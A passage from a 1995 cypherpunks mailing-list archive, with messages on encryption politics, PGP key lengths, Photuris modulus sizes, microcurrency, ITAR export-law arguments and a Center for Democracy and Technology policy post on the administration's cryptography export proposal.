in organizing the "cyberspace coalition" are starting to come together
right now, and that over the long run, this entity will be far more
beneficial in advancing a better reality through cyberspatial technology
than all the people who advocate disillusion, antagonism, resentment, 
and nonparticipation in groups and government, to the point the latter 
approach will be generally discredited. in other words, we have a powerful 
system that can be changed from the inside instead of abandoning it. at the 
moment, I've not seen any proof that a dedicated group couldn't reform it from
the inside, only a lot of cynical conventional wisdom that such a thing
is inherently impossible and useless to try.

the comment I quoted displays the conventional wisdom on this list, 
that the encryption issue is "us vs. them", "people vs. the government",
etc.  what would A.Nonymous say if someone who was elected began to 
embrace the position that encryption is a right? I'm sure he would find
some new reason to be disillusioned with government. that's the position
of radical libertarians. no matter what form government takes, no matter
who is driving it, they hate it. 

the first lesson for radical libertarians bordering on anarchists 
that love this list is not that Oppressive Government is  the problem, but 
that Government Is Always Bogus. a rather infantile philosophy that reminds
me of the way children defy authority or structure merely because it
is an authority or a structure, not because of any particular disagreements
they have with the underlying philosophy it expresses. (or rather, they
manufacture the disagreement with the philosophy as required, such that
the reasoning is, if an authority stands for [x], then I am against [x], and
against that authority).

and this is precisely the dysfunctional
philosophy to life I am referring to that I think will be discredited in 
the long run as intellectually vacuous and actually counterproductive to
any kind of progress.

from what I have seen of Gingrich, he might be a potential leader of this
kind of "computer coalition". he is the congressman who has taken stands
on encryption issues and other key cyberspace issues that seem to suggest
an internal awareness of constitutional rights superseding momentarily-
politically-fashionable government legislative whims. of course I'm
putting on my flameproof longjohns as I say that. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 10 Nov 1995 05:56:29 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951109151948.23203B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Perry E. Metzger wrote:

> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
> 
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Actually, it makes a sort of sense; if I see a 384 bit PGP key, it 
strikes me as insecure, and I really consider it; unless it says so on 
the 1024 bit key, I wouldn't think about it much.  It's useful as a human 
identifier, assuming it's not the weakest link in the chain.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Thu, 9 Nov 1995 23:11:36 +0800
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <m0tDYGN-0002e9C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Phil" == Phil Karn <karn@qualcomm.com> writes:

    Phil> as options. There's a 2048 bit optional modulus and may even
    Phil> be a 4096-bit option if I can find one in reasonable
    Phil> time. There was going to be a 512-bit optional modulus but

I'd like to see the 4096 bit modulus. Let me know if I can help you by
donating computation power. We have a SGI Onyx with 4 processors and
several smaller SGI computers.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 10 Nov 1995 08:33:41 +0800
To: cypherpunks@toad.com
Subject: the revolution of microcurrency
Message-ID: <199511092347.PAA22507@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the topic of "microcurrency" has come up on this list before and
is reappearing with considerations being given to small charges
for Web pages. I've been thinking about this a bit and thought I'd
share some interesting ideas. (YMMV!!)

1st, there was a really excellent article on microcurrency in the
Economist I believe that was really touting it as a revolutionary
change in the economy. I agree with this wholeheartedly. the possibility
that people can

- exchange extremely small amounts of cash without the cost of overhead 
- and virtually instantaneously, 
- over large geographical distances, 
- potentially even seamlessly with regard to different currency exchanges, 
- and a large infrastructure exists to distribute intellectual property for 
  free,
- (possibly invisibly to governments)

will all contribute to a REVOLUTIONARY effect on culture.

my key idea on all of this is that the whole idea of copyright
is going to melt when you introduce cash, not be strengthened. there
are a lot of people out there who think that one has to try to put
a lock and chain on web pages or whatever that one is "selling", 
and the horrible problem of the net is that anything can be copied.
and these people are feverishly working on specious "solutions" to this 
"problem" right now.

WRONG!!

this is precisely the view from the old ideology that says, "you
have to protect what you are selling from other people or you 
won't make any money". this theme will increasingly be discredited in 
the cyberspace world, which works inherently differently in a 
remarkable manner.

I submit that things like the release of public domain standards
and products like Java and Netscape for free are not merely blips at this 
moment but increasingly are going to be the marketing plan of the future. the
idea is that you give away your product for FREE, and then people
pay you if they like it. this new ideology will be relevant to 
products that are not "things" but in fact are more in the realm of
intellectual property, i.e. writing, software, cyberspace web pages, etc.

the beauty of this system is that NO LONGER is "unauthorized
distribution" the "enemy". it is your FRIEND, a key aspect of profit!!
the company that doesn't think in terms of this new ideology will 
try to control the distribution of their product. they will set up
draconian systems that try to restrict the flow of the product
to "authorized users". (i.e. those who pay in advance). our entire
society thinks within this paradigm, including the government, which
makes noises about ways to restrict copying on the internet by 
introduction of actual physical safeguards. NOPE!!

a rather extraordinary new economy can replace this, that of voluntary
payment. widespread distribution becomes your FRIEND. you DISDAIN
things like copyright, because they prevent your "product" from reaching
the eyes of potential customers. your goal is actually to distribute
the product as far as possible, in a sort of pyramid-like scheme.
you want your "customers" to distribute your product to their friends,
so that those "friends" potentially become customers in an endless
cycle.

this approach works amazingly with writing. imagine that if John Markoff
suddenly QUIT the NYT and just wrote articles on his own. and imagine
that at the bottom, you see a message, "for more of the same, send
.5c or more to markoff@liberated.com". I submit that in the future, 
Markoff will probably be able to make more money than he does at NYT,
because he is eliminating the middleman. the newspaper company is 
primarily built as a *distribution* channel. suddenly he doesn't have
to pay anything out of his own salary, so to speak, for distribution.
distribution is *free*. he doesn't require anyone else to do it for him.
he puts his article in an appropriate place on the net and it circulates
like a VIRUS if it is well received. the more people that see the article,
the more people that pay him money.

in an information system, individual objects have no value. what has value
is the FLOW of quality information. if Markoff continues to flow with that
good information, people will continue to pay for it. they will perceive
that "by paying him, the quality information flow from him to me continues
or increases".

this same idea works with software. you don't see software as an end
product. you see it as something that is evolving over time. and whenever
you send money to a company for software, in this new system the idea
is that "I like this software, and I want to see it grow. here is my
contribution to that".

another interesting area is that of patents, and I see this dissolving
in the same way. a patent is like trying to put a lock on an idea. but
gradually people will realize, only ideas that are implemented have
any value. you can't profit and lock an idea at the same time. 
*dissemination* of ideas is what leads to profit, not locking them up.

hence there will be an economic incentive to an inventor to give away
his ideas for free, at first. in the old system, where one thinks of an idea 
as a "thing", this sounds preposterous. but in a new culture where ideas
are seen as things that need to be cultivated and grown to work, it will
seem eminently sensible. the inventor is releasing his idea to the world,
saying "I can expand on this idea, even turn it into a reality, if
you send me money". other people can of course steal the idea, but there
is no value in the idea itself: the value is in the development of it
into evolved new states, or the intellectual expertise of the inventor.

in short, microcurrency could have quite a liberating and revolutionary
effect on economics as we know it. in the current system, people are not
paid for tiny contributions to the whole. the contributions have to be
"packaged up" into something like a magazine before individuals can get
any profit. a new system may allow people to be compensated directly
for things that are hard to quantify.

 how much was Markoff's last article
worth in the NYT? that's impossible to figure out. but if you had a 
microcurrency, you can calculate exactly how much money people sent to 
Markoff for his last article. say, across the world, it totalled $843.16.
such a sum is not inconceivable. and over time it would be enough for
him to make a salary over the whole year on, perhaps!! I'm arguing that
this is increasingly going to become VIABLE over the next few years
with cyberspace and microcurrency.

the beauty of this system is that this increased granularity filters
down to individual pieces such as a single piece of writing, a single
software program, single contributions by individual people that can
be rewarded tangibly. that's all that currency is, in its most basic
form: a system whereby members of a society say to each other, 
"please continue to do that for me, do more of it, and do it even better--
because I value it *this* much!!"

there is a lot of ink in the press lately about the Netscape/Java
assault on the Microsoft bastion. I think there is something more
important conceptually going on at a lower level. Microsoft has never
released a product for free to the world. they are still in the old
paradigm, "you have to control something to prosper". they are at
this minute coming out with a PROPRIETARY (read: "you have to lock something
to profit from it") alternative to Java. Netscape understands the contrary
philosophy BEAUTIFULLY. you write the software, and DISTRIBUTE IT FOR FREE.
same with Java: you create OPEN STANDARDS. these companies don't fully
understand what direction they are going in (notice how they are only
committing to the idea of free software or standards "from the start", but
not afterwards), but I think they are the precursors to a radically 
transformed economic system based on cyberspace microcurrency. 

the microcurrency situation can even be set up in a company. "whoever
codes this computer problem will receive [x] dollars from the company".
the whole economic system becomes a fluid, pulsing entity that filters
down to the tiniest fraction of value and gives each individual a 
quantitative value on his contribution. companies talk about "incentive
systems" today, but perhaps the entire economy will become an enormous
incentive system in this way in the future!!

in this system, ultimately, I think the whole concept that someone "buys a 
product" will dissolve into the idea that "one rewards intellectual
productivity to bring more of the same". it's as fundamental and 
intuitive as the difference between atoms and bits.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@prufrocks.scranton.com>
Date: Fri, 10 Nov 1995 06:15:56 +0800
To: Dan Weinstein <djw@pdcorp.com>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <Pine.LNX.3.91.951109163123.5118A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   Where can one get a copy of ITAR? Secondly, has anyone written any 
books on the subject and if so who and what?

                    Thanks in advance,

                       Deirdre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 10 Nov 1995 07:56:00 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <m0tDf8g-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



In our recent correspondence on this list with the heading ``Re:
Exporting software doesn't mean exporting'', Michael Froomkin and I
seem to have two different areas of disagreement:  (i) whether the
ITAR's provisions relating to cryptographic software apply to foreign
persons who disclose (or transmit) cryptographic software to another
foreign person without the United States and (ii) whether there is a
separation of powers (or ultra vires) argument that can be made
against the application of those provisions to anyone, foreign or
estados-unidian, in the United States or abroad.

In this message I will limit myself to the first area of disagreement
and will try to deal with the second area in a later message.

As I tried to say, somewhat clumsily, before, and may have caused some
confusion in doing so, there are so many reasons why the provisions of
the ITAR relating to cryptographic software are unconstitutional and
so even more reasons why those provisions are unenforceable, that I
find it difficult to discuss whether those unenforceable and
unconstitutional provisions can be enforced against a foreign person
who discloses software to another person outside of the United States.
I am, after all, firmly convinced that those provisions cannot be
enforced against him, because I do not believe that those provisions
can be enforced against anyone.  (Though in some ways a foreign person
outside the United States is more vulnerable than a United States
person or a foreign person within the United States, since the outside
foreign person has (arguably) less constitutional protections.)

When I said

  (But of course the ITAR as applied to cryptographic software--and that
  is all that I am talking about--are so unconstitutional in so many
  different ways that nothing is going to turn on that one issue.)

the one issue that I was referring to was the status of outside
foreign persons and, of course, that is not the issue that ``is now in
front of two district judges.''  (I hope that the issue before the two
federal district judges is the issue of the constitutionality of the
ITAR's provisions relating to cryptographic software, but both cases
raise relatively narrow factual issues and may end up being resolved
(if one dares call such a result a resolution) on the grounds that the
issues are not appealable under the Administrative Procedure Act or
that administrative remedies were not exhausted or even that the
provisions of the ITAR in question are unconstitutional but that that
determination that is good for that day and that train only.)

Now Mr. Froomkin says:

  In short, in this particular case the ACEA, and by extention the
  ITAR, doesn't "say what it says" it "says what it must mean".

(And I dare him to make that assertion in the faculty lounge at Miami
when some of the more critical and analytically inclined members of
the Miami law faculty are present.)  I would take this as an admission
that the ACEA and the ITAR does say what it says (even if it must mean
something else) were it not for the fact that--and this was my ``ultra
vires'' point--that the ACEA doesn't say it.

(In discussing the quoted passage I am assuming that ``extention''
must mean ``extension'' and that it is not used as the opposite of
``intention'', if only because I don't know what the latter would be.
But on the other hand the only dictionaries I have to hand are the COD
and the on-line version of Webster's Collegiate.)

The AECA doesn't contain any definition of ``export'' whatsoever; the
whole issue that we are discussing turns on the interpretation of what
the ITAR says when it defines ``export'' as including:

  Disclosing (including oral or visual disclosure) or transferring
  technical data to a foreign person, whether in the United States or
  abroad ....

Now Mr. Froomkin seems to be contending that this language must be
interpreted as it would be interpreted by some sort of neo-Platonic
court (probably sitting in Rawls's original position by designation),
which he calls ``any court''.  The contention is:

  any court construing the ACEA would inevitably read the prohibition
  on "exporting" to a foreign person as not applying where the nation
  lacks jurisdiction.  

Now it was my argument--which Mr. Froomkin helpfully calls an ``ultra
vires'' argument--that any court reading the ACEA would notice (i)
that there is no language in that act defining ``export'' and (ii)
that ``export'' does not mean disclosing, or even transferring,
information (which is what cryptographic software is) and (iii) that,
in consequence, the Office of Defense Trade Controls exceeded its
congressionally granted authority, and therefore its constitutional
authority, when it came up with the perverse provision that is at
issue here.  But that is the subject of my other, as yet unwritten,
message.

Now I take it that Mr. Froomkin's contention turns on the claim that
Congress lacks jurisdiction under international law to pass a
statute--or authorize a regulation--that makes it a crime for a
foreign person to transmit something to another person when both of
them are outside the United States.  So as to avoid the other
constitutional and ultra vires and so on issues, let us assume that
Congress were to amend the ACEA to make it a crime ``to transfer a
cryptographic device to a foreign person within the United States or
abroad without first obtaining a license or a waiver of jurisdiction
from the Office of Defense Trade Controls.''

And now assume that someone, F, who is a foreign person and who has
never been in the United States transfers a cryptographic device that
was not made in the United States or by a United States company to
another foreign person who has never been in the United
States.  And now assume that F does come to the United States on a
holiday and that he is arrested and indicted for violating the AECA in
that he did transfer a cryptographic device to a foreign person.

The first thing to notice is that the indictment is not defective.
The only defense--since it is the only one that we are interested in
and we control the hypothetical--is: ``but that was in a foreign
country'' and therefore the United States has no jurisdiction under
international law (or under something) to treat F's actions as a
crime.

So the defense moves to dismiss the indictment on those grounds.  And the
prosecution stipulates that the acts charged occurred in a foreign
country, that F is a foreign person, etc.

On those facts I would hope that the court would construe the statute
as not covering F's actions outside the United States and would dismiss
the indictment, but--considering that the statute specifically says it
applies both within the United States and ``abroad''--I am not nearly
as sanguine as Mr. Froomkin is.  But let us assume that the indictment
is dismissed.

And now the hypothetical provision in the ACEA is again amended by
congress to make it a crime ``for (i) a United States citizen to
transfer a cryptographic device to a foreign person within the United
States or abroad or (ii) a foreign person to transfer a cryptographic
device to a foreign person within the United States or abroad, without
in either case first obtaining a license or a waiver of jurisdiction
from the Office of Defense Trade Controls.''


And now assume that F', who has never been in the United States
transfers a cryptographic device to a foreign person and thereafter
comes to the United States and is arrested and indicted for violating the
hypothetical provision of the ACEA.  It would seem to me that there is
no way that any but the most willfully wrong-headed court (and there
are, I admit, such courts) would construe the hypothetical provision
as not covering F's actions, since it does so clearly cover those
actions.  I mean that there is no way that the court can get away with
concluding that it does not mean what it says.

So what can F' do now?  Well, he could try to raise the claim that the
lack of ``jurisdiction''--which is the justification for Mr. Froomkin's
``any court'' construing the ITAR's actual provisions would not apply
to F or F'--is a ground for dismissing the indictment.

But how can he raise that point?  He can't very well deny that the
court has jurisdiction over his person--he's sitting in the court with
shackles on--and he can't get away with claiming that the court
doesn't have jurisdiction to try him for violating the ACEA.

So it would seem that F's only hope would be to move to dismiss the
indictment on the ground that to continue the prosecution would be to
deny him due process because the United States lacks jurisdiction
under international law.

Now I am no expert in this area, but I would be surprised if the
courts would recognize this as a constitutional defense.  As I understand
it from talking with somebody here at CWRU who is knowledgeable, the
courts of the United States tend to defer in such cases to Congress
and the executive--when they are in agreement, as they would be in our
hypothetical--and principles of international law count for little.

So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of
the crime of delivering a cryptographic device to a foreign person
outside of the United States.

Now let's get back to the ITAR as it is actually written.  In an actual
criminal action brought against a foreign person who is accused of
disclosing cryptographic information to a foreigner outside the United
States--not that I think such an action will ever actually be
brought--the government can point out to the court the facts that I
have just discussed, so the court will be aware that there is no
constitutional provision requiring the dismissal of the indictment, even
if the indictment is contrary to international law.  And a real court,
as opposed to Mr. Froomkin's ``any court'' might in those
circumstances feel free to determine that the ITAR means what it says.
(That's just common sense.)

And, were the government ever to bring such a case, it would argue,
and I think that it would convince a lot of real judges, that the
criminal action does not violate international law because the United
States is protecting its own economic interests by prosecuting foreign
persons who disclose cryptographic information to other foreign
persons outside the United States.  The government's lawyer will
argue:

  Judge, the United States is in a real bind.  It is absolutely
  necessary for our national security that we forbid the export of
  cryptographic software.  But, on the other hand, as those
  Cryptopunks keep pointing out, we are destroying our computer
  industry by enforcing the ITAR against American companies.  So the
  only solution is to apply the ITAR against foreigners as well so
  that the American computer industry will have a levelled--I mean a
  level--field to play upon.  And the anti-trust cases make it
  absolutely clear that the United States does have jurisdiction to
  enforce its laws against foreign criminals who break those laws
  outside of the United States when their crimes have a negative
  effect upon the economy of the United States.

I am afraid that most federal district court judges would buy that
argument, and I am not even sure that Mr. Froomkin's ``any court''
wouldn't buy it. 

And, in any case, if such a criminal case were to be brought, the
government would almost certainly be able to allege additional facts
to help justify the claim that the US does have jurisdiction over the
matter under international law.

For example, the defendant might be French, and the French government
might be cheering the United States government on.  If the crime is a
crime under both French law and the law of the United States then
there is going to be no problem with the United States asserting
jurisdiction.  (That is, if I understand it correctly, Mr. Froomkin's
murder example.)

Or the defendant may have studied cryptography in the United States,
before he returned home and disclosed the information.

Or the information that he disclosed had previously been unlawfully
exported from the United States in violation of the ITAR (PGP, for
example).

Or the foreign person is an employee of a United States company or a
foreign company doing business in the United States.

Or even that the disclosure was done by a message transmitted over the
Internet that happened to be routed through the United States.

But the matter is even more simple than that since the government is
not going to bring those criminal charges against a foreign person or
a United States person or anyone else if they can possibly avoid it.
The ITAR's provisions on cryptographic software are used by the
government to spread fear, uncertainty, and doubt, and to discourage
the spread of strong cryptography.  Since an actual criminal case
would almost certainly result in at least significant parts of those
provisions being held unconstitutional, the government is not going to
bring such a case if it can find any other ways of satisfying its
goal.

And looked at that way, our foreign person who discloses cryptographic
software to one or more other foreign persons abroad is going to be
the perfect fall guy.  As I have suggested before, the government will
simply bar him from getting a visa to enter the United States since
violation of United States foreign trade regulations is a ground for
denying a visa--at least an immigrant's visa.  And, despite Mr.
Froomkin's claim that our foreign person would have a cause of action
if his ``petition'' were denied, he would probably have no recourse
whatsoever.  Certainly he would have no claim that the United States
has no jurisdiction to exclude him for acts done by him outside the
United States; the United States has jurisdiction to exclude
foreigners for things that the foreigners did outside the United
States, like believing in polygamy.  And a foreign person outside the
United States may not have standing to complain of violations of his
freedom of speech outside the United States in an American court.

But let us assume, contra-factually that Mr. Froomkin is right, and
that the poor, excluded foreign person would have a good cause of
action to force the government to give him a visa.  (Though I really
am curious as to what that action would be.)  That cause of action is
going to cost tens of thousands of dollars to pursue, and it will take
years before it is resolved in favour of our foreign person, who will
be excluded--or sitting in jail with a bunch of Cuban and Chinese
refugees--until the case is resolved in his failure.

I am sorry to have written such a long message, and to have been so
slow in writing it, but I think that part of the problem is that both
Mr. Froomkin and I were shooting from the hip, and that is why our
disagreement grew.

But perhaps it has all been worthwhile, for I do think that there are
a few useful conclusions that can be drawn from this discussion:

  (i) We academic lawyers tend to try to settle real world questions
  as if they were academic questions;

  (ii) It is never safe to assume that any court will construe a
  statute or a regulation as meaning something other than what it
  says; 

  (iii) One can only construe a legal text in a particular context;
  even if one thinks that one can figure out how any court would
  interpret the text in question, one still needs to know how the text
  got before the court; and

  (iv) The fact that you can always sue the police for unconstitutional
  harassment isn't of much help when they reach for the rubber hose.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 11 Nov 1995 06:46:33 +0800
To: cypherpunks@toad.com
Subject: Re: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511091637.RAA06491@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


At 1:14 AM 11/9/95, Bill Stewart wrote:

 <deletia>
| The fact that Netscape is including
| secure email in their Navigator next release can be a big lever pushing the
| Feds toward giving up, and perhaps deserves some publicity once the 
| release version is out the door.

Giving up on what? On doing everything within its power to keep the world
beyond itself strong-crypto-free? Not likely.

In only a few decades, crypto's gone from being unheard of to the object
of an increasingly high-profile PR war over "domestic and international
terrorists and criminals." The govt's position, however, hasn't changed
substantially: it doesn't like crypto, and it never will. There will never
be a time when the cops who pull you over or drop by for a visit will say,
"Ma'am, if you've encrypted that, we respect the fact that you don't want
anyone to see that--so we'll just be going now. You have a nice day, now,
y'hear." And there will never be no cops.

The gov't may well lose this fight eventually, but a few heads are gonna
get broken before either side wins. This fight is playing itself out on
the level of policy now, but it's much bigger than a policy issue. And the
"revolution" of Newt and his legions of weenies (I say nothing of Clinton
and his legions of weenies) is bullshit: he's an empty opportunist who's
riding a fractious coalition that'll make Clinton look like a libertarian
if it ever gets control of the country. And right now he's cluing in to
the fact that he can score some points on encryption issues: he's got his
eye on the snowballing WiReD coalition, which *no one* knew existed until
a few years ago.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 10:25:29 +0800
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
Message-ID: <199511100140.RAA09572@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:28 11/9/95 -0800, Timothy C. May wrote:
>With all due respect to Bill--his mention of agorics tells me he knows
>something about computational ecologies and markets--, there is no
>reasonable way to say what price is "closer to the current market value of
>the page content," except by what the market will bear!

Tim is absolutely correct that the market determines the current market
value.  I mentioned some low value items in the current market and he
mentioned some high value ones.

However, there is not really a problem in paying for high valued web pages
(like the $400/photo consultant report he mentions).  The various network
payment schemes that have been proposed and implemented will handle these
quite adequately.

What concerns me is building systems that can support low-cost high-volume
markets.  If I have to pay a penny/page, I am going to ask whether Netscape
can use a whole gigabyte disk for its cache and have basically a pay/copy
system.  If the cost is low enough, I will pay/view and avoid stale data in
the cache problems.  However, there are very few systems where the
transaction costs are low enough to support low-cost high-volume markets.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Fri, 10 Nov 1995 10:36:08 +0800
To: stewarts@ix.netcom.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090913.BAA08368@ix.ix.netcom.com>
Message-ID: <199511100142.RAA13467@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>If speed is really a concern, you could do a 640 or 768 bit modulus

Hilarie suggested exactly this in private mail, and I've agreed. I'm
going to generate a 768-bit optional modulus.

Bill has also suggested a killer 4096-bit modulus for the truly
paranoid. Not sure my poor 32MB P90 can handle that without thrashing
its guts out, but I'll give it a try.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (editor@cdt.org)
Date: Fri, 10 Nov 1995 08:48:18 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post No. 29 - Coalition Says New Crypto Policy Flawed
Message-ID: <v02130505acc847b81d63@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


Pardon the massive mailing (I have never posted a full Policy Post to this
list before), but I thought a majority of you would find this interesting
and relevant.

Jonah
(editor@cdt.org)

------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************
  **         **      **       ***               POLICY POST
  **         **      **       ***
  **         **      **       ***               November 9, 1995
  **         **      **       ***               Number 29
  ********   *********        ***
   ******    ********         ***

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 29                      November 9, 1995

CONTENTS: (1) Public Interest/Industry Coalition Says Administration Crypto
              Policy Flawed -- Pledges to Develop Alternative
          (2) Text of CDT-led coalition letter to Vice President Gore
          (3) How To Subscribe To The CDT Policy Post Distribution List
          (4) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor@cdt.org)
-------------------------------------------------------------------------

(1) Public Interest/Industry Coalition Says Administration Crypto Policy
    Flawed -- Pledges to Develop Alternative

A broad coalition of nearly forty public-interest organizations, trade
associations, and representatives from the telecommunications and computer
hardware and software industries sent the attached letter to Vice President
Albert Gore on Wednesday, objecting to the Administration's recently
announced cryptography policy.

While the letter praised the administration for its efforts to develop a
national cryptography policy, the signatories, which include groups such as
EFF and companies such as America Online, Apple, AT&T, MCI, Lotus,
Microsoft, and Tandem Computer (organized by CDT), expressed concern that
the Administration's proposal is weighed heavily in favor of law
enforcement and national security while neglecting the privacy and security
needs of individuals and the marketplace.

The letter states:

 "A secure, private, and trusted Global Information Infrastructure
  (GII) is essential to promote economic growth and meet the needs of
  the Information Age society.  Competitive businesses need cryptography
  to protect proprietary information as it flows across increasingly
  vulnerable global networks. Individuals require privacy protection in
  order to build the confidence necessary to use the GII for personal and
  financial transactions... The undersigned groups recognize that
  the Administration's recently articulated cryptography initiative was a
  serious attempt to meet some of these challenges, but the proposed
  initiative is no substitute for a comprehensive national cryptography
  policy.  To the extent that the current policy becomes a substitute for
  a more comprehensive policy, the initiative actually risks hindering
  the development of a secure and trusted GII."

The coalition pledged to work together to formulate recommendations for an
alternative cryptography policy based on the following principles:

* ROBUST SECURITY:  access to levels of encryption sufficient to address
  domestic and international security threats, especially as advances in
  computing power make currently deployed cryptography systems less
  secure.

* INTERNATIONAL INTEROPERABILITY:  the ability to securely interact
  worldwide.

* VOLUNTARY USE: freedom for users to choose encryption solutions,
  developed in the marketplace, that meet their particular needs.

* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to
  meet the expressed needs of cryptography users.

* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth
  Amendment privacy protection and regulation of searches, seizures, and
  interceptions.

* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national
  security, while recognizing the reality that determined criminals will
  have access to virtually unbreakable encryption.

A second group, composed of conservative/libertarian organizations
including Americans for Tax Reform and Citizens for A Sound Economy, issued
a similar letter on Wednesday to House Speaker Newt Gingrich. The text of
that letter, as well as additional information on the cryptography policy
debate, can be found on CDT's Cryptography Issues Page:

        URL:http://www.cdt.org/crypto.html

The letters come as the National Institute of Standards & Technology (NIST)
this week announced revisions to the Administration's proposed export
criteria announced last September (See CDT Policy Post No. 24). The revised
proposal is substantively similar to the previous version, and maintains
controversial provisions including:

* LIMITS ON KEY LENGTH: The revised proposal would continue to only
  allow the export of cryptography systems with 64 bit key lengths, but
  only if the keys are escrowed by an agent approved by the U.S.
  Government and if the systems meet the other export criteria.

* RESTRICTED INTEROPERABILITY: While the revised proposal does clarify
  the interoperability provision,  it would continue to prohibit
  exportable products from operating with any other cryptographic
  products that do not meet the NIST criteria.

* NO PRIVACY SAFEGUARDS: The proposal contains no mention of the
  procedures for law enforcement access to escrowed keys, the standards
  for certifying escrow agents, or the obligations on escrow agents to
  protect privacy.

CDT believes that the NIST proposals fall far short of the promise for a
more sensible and comprehensive cryptography policy outlined last July in
Vice President Gore's letter to Rep. Maria Cantwell.  The current proposal
fails to provide adequate security, protect the privacy of individuals, and
meet the needs of the global marketplace. CDT believes that a more
comprehensive approach to cryptography policy is necessary to address both
the immediate need for strong cryptographic applications and the long-term
development of a secure and trusted Global Information Infrastructure. CDT
will work with the signatories of the letter over the next six months to
develop an alternative to the Administration's proposal.

-----------------------------------------------------------------------

(2) Text of CDT-led Coalition Letter to Vice President Gore


November 8, 1995

The Honorable Albert Gore, Jr.
Office of the Vice President
Old Executive Office Building, Room 276
Washington, D.C. 20501

Dear Mr. Vice President:

A secure, private, and trusted Global Information Infrastructure (GII) is
essential to promote economic growth and meet the needs of the Information
Age society.  Competitive businesses need cryptography to protect
proprietary information as it flows across increasingly vulnerable global
networks. Individuals require privacy protection in order to build the
confidence necessary to use the GII for personal and financial
transactions.  Promoting the development of the GII and meeting the needs
of the Information Age will require strong, flexible, widely-available
cryptography.  The undersigned groups recognize that the Administration's
recently articulated cryptography initiative was a serious attempt to meet
some of these challenges, but the proposed initiative is no substitute for
a comprehensive national cryptography policy.  To the extent that the
current policy becomes a substitute for a more comprehensive policy, the
initiative actually risks hindering the development of a secure and trusted
GII.

A number of the undersigned organizations have already written to express
concern about the latest Administration cryptography initiative. As some of
us have noted, the Administration's proposed export criteria will not allow
users to choose the encryption systems that best suit their security
requirements.  Government ceilings on key lengths will not provide an
adequate level of security for many applications, particularly as advances
in computing render current cryptography systems less secure.   Competitive
international users are steadily adopting stronger foreign encryption in
their products and will be unlikely to embrace U.S. restrictions.  As they
stand, current export restrictions place U.S. hardware manufacturers,
software developers, and computer users at a competitive disadvantage,
seriously hinder international interoperability, and threaten the
strategically important U.S. communications and computer hardware and
software industries. Moreover, the Administration policy does not spell out
any of the privacy safeguards essential to protect individual liberties and
to build the necessary public trust in the GII.

The current policy directive also does not address the need for immediate
